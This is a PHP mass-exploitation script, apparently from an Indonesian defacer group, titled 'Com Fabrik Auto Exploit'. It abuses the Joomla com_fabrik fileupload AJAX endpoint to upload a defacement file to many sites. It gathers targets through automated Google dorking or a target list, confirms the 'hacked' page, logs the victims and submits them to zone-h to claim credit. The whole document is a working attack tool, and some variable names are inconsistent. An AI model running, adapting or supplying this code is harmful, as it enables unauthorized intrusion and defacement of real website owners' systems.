Bot Com Fabrik Auto Dorking Dan Exploit

1. <?php
2. error_reporting(0);
3. /*
4.     Com_Fabrik Auto Exploit
5.     Re Code By ZakirDotID
6.     Thanks To : IndoXploit
7. */
8. class excom
9. {
10. public $url;
11. public $file="sad.htm"; // Ganti Dengan File Defacemu 1 dir
12. public $hacker = "ZakirDotID";   // Ganti Dengan Nick mu
13. public $dorking=0; //Ubah jadi 1 jika ingin aktifkan mode auto dorking
14. public $var;
15. public $ch;
16. public function valid($url){
17. if(!preg_match("/^http:\/\//", $url) and !preg_match("/^https:\/\//", $url)){
18.     return $this->url="http://".$url;
19. }else{
20.     return $url;
21. }
22. }
23. public function jonh($url){
24.     $this->var = $this->cUrl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
25.     if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $this->var->response, $matches)) {
26.             if($matches[1] === "ERROR") {
27.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $this->var->response, $matches2);
28.                 echo "\t[!] $url ==> Not Vuln Zone-H\n";
29.             } else {
30.                 echo "\t[+] $url ==> Success\n";
31.             }
32.         }
33. }
34. public function simpan($file){$this->var=fopen("hasil-exploit.txt", "a+");fwrite($this->var, $file."\r\n");fclose($this->var);}
35. public function exploit(){
36.     $this->ur1  = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
37.     $this->var = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$this->ur1\"");
38.     $this->result = (object) json_decode($this->var,true);
39.     if(isset($this->result->error)){
40.     echo "\t[!] ".parse_url($this->url,PHP_URL_HOST). " ==> Failed\n"; 
41.     } else {
42.     if(isset($this->result->uri)){
43.         if(preg_match("/hacked/i", $this->cUrl($this->uri)->response)){
44.             echo "\t[+] $this->result->uri ==> eXploit\n";
45.             $this->jonh($this->uri);
46.             $this->simpan($this->uri);
47.         }
48.     }  
49.     }
50. }
51. public function cUrl($url,$data=null,$headers=null,$cookie=true){
52.         $this->ch = curl_init();
53.               curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, TRUE);
54.               curl_setopt($this->ch, CURLOPT_URL, $url);
55.               curl_setopt($this->ch, CURLOPT_USERAGENT, "LinuxG3k/10.1");
56.               curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, FALSE);
57.               curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, FALSE);
58.               curl_setopt($this->ch, CURLOPT_CONNECTTIMEOUT, 5);
59.               curl_setopt($this->ch, CURLOPT_TIMEOUT, 5);
60.         if($data !== null) {
61.               curl_setopt($this->ch, CURLOPT_CUSTOMREQUEST, "POST");
62.               curl_setopt($this->ch, CURLOPT_POST, TRUE);
63.               curl_setopt($this->ch, CURLOPT_POSTFIELDS, $data);
64.         }
65.         if($headers !== null) {
66.               curl_setopt($this->ch, CURLOPT_HTTPHEADER, $headers);
67.         }
68.         if($cookie === true) {
69.               curl_setopt($this->ch, CURLOPT_COOKIE, TRUE);
70.               curl_setopt($this->ch, CURLOPT_COOKIEFILE, "cookie.txt");
71.               curl_setopt($this->ch, CURLOPT_COOKIEJAR, "cookie.txt");
72.         }
73.         $this->exec = curl_exec($this->ch);
74.         $this->info = curl_getinfo($this->ch);
75.               curl_close($this->ch);
76.         return (object) [
77.             "response"  => $this->exec,
78.             "info"      => $this->info
79.         ];
80.     }
81.     public function _rd(){return fopen("php://stdin", "r");}
82.     public function _ndas(){
83.     echo "\n\t============================================================\n"; 
84.     echo "\tIndoXploit Tools Recode By ZakirDotID\n";
85.     echo "\tThanks For : IndoXploit - Garuda Security Hacker\n";
86.     echo "\tIf Iam Sad , Iam Back !";
87.     echo "\n\t============================================================\n";
88.     }
89. }
90. $z = new excom();
91. $z->_ndas();
92. echo "\n\tExploit Com Fabrik With Auto Dorking By ZakirDotID\n";
93. if($z->dorking == 1){
94. echo "\n\tInput Dork : ";
95. $dork = $z->_rd();
96. $dork = trim(fgets($dork));
97. $links = array();
98. for($i=0;$i<=1000;$i+=10){
99. @$xml = new DOMDocument('1.0', "UTF-8");
100. @$xml->loadHTMLFile("http://www.google.com/search?q=".urlencode($dork)."&start=$i");
101.     foreach($xml->getElementsByTagName('cite') as $link) {
102.         $su =  "http://$link->nodeValue";
103.         $ahh = parse_url($su, PHP_URL_HOST);
104.         if(in_array($ahh, $links) or preg_match("/blogspot/",$ahh)) {
105.              echo "$ahh Not Vuln\n";
106. } else{
107.     $links[] = $ahh;
108.     foreach ($links as $asu) {
109.         $z->url = $z->valid($asu);
110.         echo $z->exploit();
111.        
112.     }
113. }
114. }
115. }
116. } else {
117. echo "\n\tInput List Target :";
118. $kk = $z->_rd();
119. $kk = trim(fgets($kk));
120. $file = file_get_contents($kk) or exit("\n\tFile Not FOund\n");
121. $zlz = explode("\r\n", $file);
122. foreach ($zlz as $loo) {
123.     $url = $z->valid($loo);
124.     echo $z->exploit();
125. }
126. }